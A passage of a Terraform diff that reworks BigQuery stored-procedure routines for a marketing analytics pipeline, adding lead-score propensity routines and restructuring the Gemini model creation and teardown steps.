"google_bigquery_routine" "user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -847,7 +985,7 @@ data "local_file" "aggregate_predictions_procedure_file" { # The aggregate_last_day_predictions procedure is designed to aggregated the latest predictions from all models. resource "google_bigquery_routine" "aggregate_last_day_predictions" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregate_predictions_project_id : local.feature_store_project_id + project = local.aggregate_predictions_project_id dataset_id = module.aggregated_predictions.bigquery_dataset.dataset_id routine_id = "aggregate_last_day_predictions" routine_type = "PROCEDURE" @@ -855,33 +993,6 @@ resource "google_bigquery_routine" "aggregate_last_day_predictions" { definition_body = data.local_file.aggregate_predictions_procedure_file.content } -# This resource reads the contents of a local SQL file named user_behaviour_revenue_insights.sql and -# stores it in a variable named user_behaviour_revenue_insights_file.content. -# The SQL file is expected to contain the definition of a BigQuery procedure named user_behaviour_revenue_insights. -data "local_file" "user_behaviour_revenue_insights_file" { - filename = "${local.sql_dir}/procedure/user_behaviour_revenue_insights.sql" -} - -# The user_behaviour_revenue_insights procedure is designed to generate gemini insights. -resource "google_bigquery_routine" "user_behaviour_revenue_insights" { - project = null_resource.check_bigquery_api.id != "" ? 
local.gemini_insights_project_id : local.feature_store_project_id - dataset_id = local.config_bigquery.dataset.gemini_insights.name - routine_id = "user_behaviour_revenue_insights" - routine_type = "PROCEDURE" - language = "SQL" - definition_body = data.local_file.user_behaviour_revenue_insights_file.content - description = "Procedure that generates gemini insights for . Daily granularity level. Run this procedure every day before consuming gemini insights on the Looker Dahboard." - arguments { - name = "input_date" - mode = "INOUT" - data_type = jsonencode({ "typeKind" : "DATE" }) - } - - depends_on = [ - null_resource.check_gemini_model_exists - ] -} - /* *Including the backfill routines */ @@ -893,7 +1004,7 @@ data "local_file" "invoke_backfill_customer_lifetime_value_label_file" { # The invoke_backfill_customer_lifetime_value_label procedure is designed to invoke the backfill query for customer_lifetime_value_label. resource "google_bigquery_routine" "invoke_backfill_customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -907,7 +1018,7 @@ data "local_file" "invoke_backfill_purchase_propensity_label_file" { } resource "google_bigquery_routine" "invoke_backfill_purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_purchase_propensity_label" routine_type = "PROCEDURE" @@ -921,7 +1032,7 @@ data "local_file" "invoke_backfill_churn_propensity_label_file" { } resource "google_bigquery_routine" "invoke_backfill_churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_churn_propensity_label" routine_type = "PROCEDURE" @@ -930,12 +1041,26 @@ resource "google_bigquery_routine" "invoke_backfill_churn_propensity_label" { description = "Procedure that backfills the churn_propensity_label feature table. Run this procedure occasionally before training the models." } +data "local_file" "invoke_backfill_lead_score_propensity_label_file" { + filename = "${local.sql_dir}/query/invoke_backfill_lead_score_propensity_label.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_backfill_lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_lead_score_propensity_label_file.content + description = "Procedure that backfills the lead_score_propensity_label feature table. Run this procedure occasionally before training the models." +} + data "local_file" "invoke_backfill_user_dimensions_file" { filename = "${local.sql_dir}/query/invoke_backfill_user_dimensions.sql" } resource "google_bigquery_routine" "invoke_backfill_user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_dimensions" routine_type = "PROCEDURE" @@ -949,7 +1074,7 @@ data "local_file" "invoke_backfill_user_lifetime_dimensions_file" { } resource "google_bigquery_routine" "invoke_backfill_user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -964,7 +1089,7 @@ data "local_file" "invoke_backfill_user_lookback_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_lookback_metrics" routine_type = "PROCEDURE" @@ -979,7 +1104,7 @@ data "local_file" "invoke_backfill_user_rolling_window_lifetime_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -994,7 +1119,7 @@ data "local_file" "invoke_backfill_user_rolling_window_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -1003,13 +1128,27 @@ resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_metrics" description = "Procedure that backfills the user_rolling_window_metrics feature table. Run this procedure occasionally before training the models." } +data "local_file" "invoke_backfill_user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/query/invoke_backfill_user_rolling_window_lead_metrics.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_backfill_user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_user_rolling_window_lead_metrics_file.content + description = "Procedure that backfills the user_rolling_window_lead_metrics feature table. Run this procedure occasionally before training the models." +} + data "local_file" "invoke_backfill_user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/query/invoke_backfill_user_scoped_lifetime_metrics.sql" } resource "google_bigquery_routine" "invoke_backfill_user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -1023,7 +1162,7 @@ data "local_file" "invoke_backfill_user_scoped_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_metrics" routine_type = "PROCEDURE" @@ -1037,7 +1176,7 @@ data "local_file" "invoke_backfill_user_scoped_segmentation_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -1051,7 +1190,7 @@ data "local_file" "invoke_backfill_user_segmentation_dimensions_file" { } resource "google_bigquery_routine" "invoke_backfill_user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -1065,7 +1204,7 @@ data "local_file" "invoke_backfill_user_session_event_aggregated_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -1074,25 +1213,6 @@ resource "google_bigquery_routine" "invoke_backfill_user_session_event_aggregate description = "Procedure that backfills the user_session_event_aggregated_metrics feature table. Run this procedure occasionally before training the models." } -data "local_file" "invoke_backfill_user_behaviour_revenue_insights_file" { - filename = "${local.sql_dir}/query/invoke_backfill_user_behaviour_revenue_insights.sql" -} - -resource "google_bigquery_routine" "invoke_backfill_user_behaviour_revenue_insights" { - project = null_resource.check_gemini_model_exists.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id - dataset_id = local.config_bigquery.dataset.gemini_insights.name - routine_id = "invoke_backfill_user_behaviour_revenue_insights" - routine_type = "PROCEDURE" - language = "SQL" - definition_body = data.local_file.invoke_backfill_user_behaviour_revenue_insights_file.content - description = "Procedure that backfills the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure occasionally before consuming gemini insights on the Looker Dahboard." 
- - depends_on = [ - null_resource.check_gemini_model_exists, - null_resource.create_gemini_model - ] -} - /* *Including the Inference, Training and Explanation routines */ @@ -1103,7 +1223,7 @@ data "local_file" "invoke_customer_lifetime_value_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "invoke_customer_lifetime_value_inference_preparation" routine_type = "PROCEDURE" @@ -1117,7 +1237,7 @@ data "local_file" "invoke_purchase_propensity_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "invoke_purchase_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -1131,7 +1251,7 @@ data "local_file" "invoke_churn_propensity_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_churn_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "invoke_churn_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -1139,13 +1259,26 @@ resource "google_bigquery_routine" "invoke_churn_propensity_inference_preparatio definition_body = data.local_file.invoke_churn_propensity_inference_preparation_file.content } +data "local_file" "invoke_lead_score_propensity_inference_preparation_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_inference_preparation.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_inference_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "invoke_lead_score_propensity_inference_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_inference_preparation_file.content +} + data "local_file" "invoke_audience_segmentation_inference_preparation_file" { filename = "${local.sql_dir}/query/invoke_audience_segmentation_inference_preparation.sql" } resource "google_bigquery_routine" "invoke_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "invoke_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -1158,7 +1291,7 @@ data "local_file" "invoke_auto_audience_segmentation_inference_preparation_file" } resource "google_bigquery_routine" "invoke_auto_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? 
local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "invoke_auto_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -1171,7 +1304,7 @@ data "local_file" "invoke_auto_audience_segmentation_training_preparation_file" } resource "google_bigquery_routine" "invoke_auto_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "invoke_auto_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -1185,7 +1318,7 @@ data "local_file" "invoke_customer_lifetime_value_training_preparation_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "invoke_customer_lifetime_value_training_preparation" routine_type = "PROCEDURE" @@ -1199,7 +1332,7 @@ data "local_file" "invoke_purchase_propensity_training_preparation_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "invoke_purchase_propensity_training_preparation" routine_type = "PROCEDURE" @@ -1213,7 +1346,7 @@ data "local_file" "invoke_churn_propensity_training_preparation_file" { } resource "google_bigquery_routine" "invoke_churn_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "invoke_churn_propensity_training_preparation" routine_type = "PROCEDURE" @@ -1222,12 +1355,25 @@ resource "google_bigquery_routine" "invoke_churn_propensity_training_preparation } +data "local_file" "invoke_lead_score_propensity_training_preparation_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_training_preparation.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_training_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "invoke_lead_score_propensity_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_training_preparation_file.content +} + data "local_file" "invoke_audience_segmentation_training_preparation_file" { filename = "${local.sql_dir}/query/invoke_audience_segmentation_training_preparation.sql" } resource "google_bigquery_routine" "invoke_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? 
local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "invoke_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -1242,11 +1388,11 @@ data "local_file" "invoke_aggregated_value_based_bidding_training_preparation_fi # Terraform resource for invoking the bigquery stored procedure resource "google_bigquery_routine" "invoke_aggregated_value_based_bidding_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "invoke_aggregated_value_based_bidding_training_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "invoke_aggregated_value_based_bidding_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.invoke_aggregated_value_based_bidding_training_preparation_file.content } @@ -1257,11 +1403,11 @@ data "local_file" "invoke_aggregated_value_based_bidding_explanation_preparation # Terraform resource for invoking the bigquery stored procedure resource "google_bigquery_routine" "invoke_aggregated_value_based_bidding_explanation_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "invoke_aggregated_value_based_bidding_explanation_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "invoke_aggregated_value_based_bidding_explanation_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.invoke_aggregated_value_based_bidding_explanation_preparation_file.content } @@ -1274,7 +1420,7 @@ data "local_file" "invoke_customer_lifetime_value_label_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -1288,7 +1434,7 @@ data "local_file" "invoke_purchase_propensity_label_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_purchase_propensity_label" routine_type = "PROCEDURE" @@ -1298,12 +1444,26 @@ resource "google_bigquery_routine" "invoke_purchase_propensity_label" { } +data "local_file" "invoke_lead_score_propensity_label_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_label.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_label_file.content + description = "Procedure that invokes the lead_score_propensity_label table. Daily granularity level. Run this procedure daily before running prediction pipelines." +} + data "local_file" "invoke_churn_propensity_label_file" { filename = "${local.sql_dir}/query/invoke_churn_propensity_label.sql" } resource "google_bigquery_routine" "invoke_churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_churn_propensity_label" routine_type = "PROCEDURE" @@ -1318,7 +1478,7 @@ data "local_file" "invoke_user_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_dimensions" routine_type = "PROCEDURE" @@ -1332,7 +1492,7 @@ data "local_file" "invoke_user_lifetime_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -1347,7 +1507,7 @@ data "local_file" "invoke_user_lookback_metrics_file" { } resource "google_bigquery_routine" "invoke_user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_lookback_metrics" routine_type = "PROCEDURE" @@ -1362,7 +1522,7 @@ data "local_file" "invoke_user_rolling_window_lifetime_metrics_file" { } resource "google_bigquery_routine" "invoke_user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -1377,7 +1537,7 @@ data "local_file" "invoke_user_rolling_window_metrics_file" { } resource "google_bigquery_routine" "invoke_user_rolling_window_metrics" { - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -1387,12 +1547,26 @@ resource "google_bigquery_routine" "invoke_user_rolling_window_metrics" { } +data "local_file" "invoke_user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/query/invoke_user_rolling_window_lead_metrics.sql" +} + +resource "google_bigquery_routine" "invoke_user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_user_rolling_window_lead_metrics_file.content + description = "Procedure that invokes the user_rolling_window_lead_metrics table. Daily granularity level. Run this procedure daily before running prediction pipelines." +} + data "local_file" "invoke_user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/query/invoke_user_scoped_lifetime_metrics.sql" } resource "google_bigquery_routine" "invoke_user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -1406,7 +1580,7 @@ data "local_file" "invoke_user_scoped_metrics_file" { } resource "google_bigquery_routine" "invoke_user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_metrics" routine_type = "PROCEDURE" @@ -1420,7 +1594,7 @@ data "local_file" "invoke_user_scoped_segmentation_metrics_file" { } resource "google_bigquery_routine" "invoke_user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -1434,7 +1608,7 @@ data "local_file" "invoke_user_segmentation_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -1448,7 +1622,7 @@ data "local_file" "invoke_user_session_event_aggregated_metrics_file" { } resource "google_bigquery_routine" "invoke_user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? 
local.purchase_propensity_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -1464,29 +1638,47 @@ data "local_file" "create_gemini_model_file" { # This resource executes gcloud commands to run a query that creates a gemini model connected to Vertex AI LLM API. resource "null_resource" "create_gemini_model" { triggers = { - vertex_ai_connection_exists = google_bigquery_connection.vertex_ai_connection.id, - gemini_dataset_exists = module.gemini_insights.bigquery_dataset.id, + #gemini_dataset_exists = module.gemini_insights.bigquery_dataset.id, check_gemini_dataset_listed = null_resource.check_gemini_insights_dataset_exists.id + + create_command = <<-EOT + ${var.uv_run_alias} bq query --use_legacy_sql=false --max_rows=100 --maximum_bytes_billed=10000000 < ${data.local_file.create_gemini_model_file.filename} + EOT + + # The destroy command deletes the model. + destroy_command = <<-EOT + ${var.uv_run_alias} bq rm -f --model ${local.gemini_insights_project_id}:${local.config_bigquery.dataset.gemini_insights.name}.gemini_1_5_pro + EOT } provisioner "local-exec" { - command = <<-EOT - ${local.poetry_run_alias} bq query --use_legacy_sql=false --max_rows=100 --maximum_bytes_billed=10000000 < ${data.local_file.create_gemini_model_file.filename} - EOT + when = create + command = self.triggers.create_command + } + + provisioner "local-exec" { + when = destroy + command = self.triggers.destroy_command + } + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true } depends_on = [ - google_bigquery_connection.vertex_ai_connection, - module.gemini_insights.google_bigquery_dataset, - null_resource.check_gemini_insights_dataset_exists + #module.gemini_insights.google_bigquery_dataset, + null_resource.check_gemini_insights_dataset_exists, ] } # Since enabling APIs can take a few seconds, we need to make the deployment wait until the model is created in BigQuery. resource "null_resource" "check_gemini_model_exists" { triggers = { - vertex_ai_connection_exists = google_bigquery_connection.vertex_ai_connection.id - gemini_model_created = null_resource.create_gemini_model.id + gemini_model_created = null_resource.create_gemini_model.id } provisioner "local-exec" { @@ -1498,17 +1690,15 @@ resource "null_resource" "check_gemini_model_exists" { sleep 5 printf "." COUNTER=$((COUNTER + 1)) + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "Gemini model was not created, terraform can not continue!" + exit 1 + fi done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "Gemini model was not created, terraform can not continue!" - exit 1 - fi - sleep 5 EOT } depends_on = [ - google_bigquery_connection.vertex_ai_connection, null_resource.create_gemini_model ] } @@ -1518,7 +1708,7 @@ data "local_file" "invoke_user_behaviour_revenue_insights_file" { } resource "google_bigquery_routine" "invoke_user_behaviour_revenue_insights" { - project = null_resource.check_gemini_model_exists.id != "" ? 
local.gemini_insights_project_id : local.feature_store_project_id + project = local.gemini_insights_project_id dataset_id = local.config_bigquery.dataset.gemini_insights.name routine_id = "invoke_user_behaviour_revenue_insights" routine_type = "PROCEDURE" @@ -1527,7 +1717,71 @@ resource "google_bigquery_routine" "invoke_user_behaviour_revenue_insights" { description = "Procedure that invokes the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure daily before consuming gemini insights on the Looker Dashboard." depends_on = [ + module.gemini_insights.google_bigquery_dataset, + #null_resource.check_gemini_model_exists, + ] +} + +# This resource reads the contents of a local SQL file named user_behaviour_revenue_insights.sql and +# stores it in a variable named user_behaviour_revenue_insights_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named user_behaviour_revenue_insights. +data "local_file" "user_behaviour_revenue_insights_file" { + filename = "${local.sql_dir}/procedure/user_behaviour_revenue_insights.sql" +} + +# The user_behaviour_revenue_insights procedure is designed to generate gemini insights. +resource "google_bigquery_routine" "user_behaviour_revenue_insights" { + project = local.gemini_insights_project_id + dataset_id = local.config_bigquery.dataset.gemini_insights.name + routine_id = "user_behaviour_revenue_insights" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.user_behaviour_revenue_insights_file.content + description = "Procedure that generates gemini insights for user behaviour and revenue. Daily granularity level. Run this procedure every day before consuming gemini insights on the Looker Dashboard." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } + + depends_on = [ + #module.gemini_insights.google_bigquery_dataset, + null_resource.check_gemini_model_exists, + ] +} + + +data "local_file" "invoke_backfill_user_behaviour_revenue_insights_file" { + filename = "${local.sql_dir}/query/invoke_backfill_user_behaviour_revenue_insights.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_user_behaviour_revenue_insights" { + project = local.gemini_insights_project_id + dataset_id = local.config_bigquery.dataset.gemini_insights.name + routine_id = "invoke_backfill_user_behaviour_revenue_insights" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_user_behaviour_revenue_insights_file.content + description = "Procedure that backfills the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure occasionally before consuming gemini insights on the Looker Dashboard." + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table.
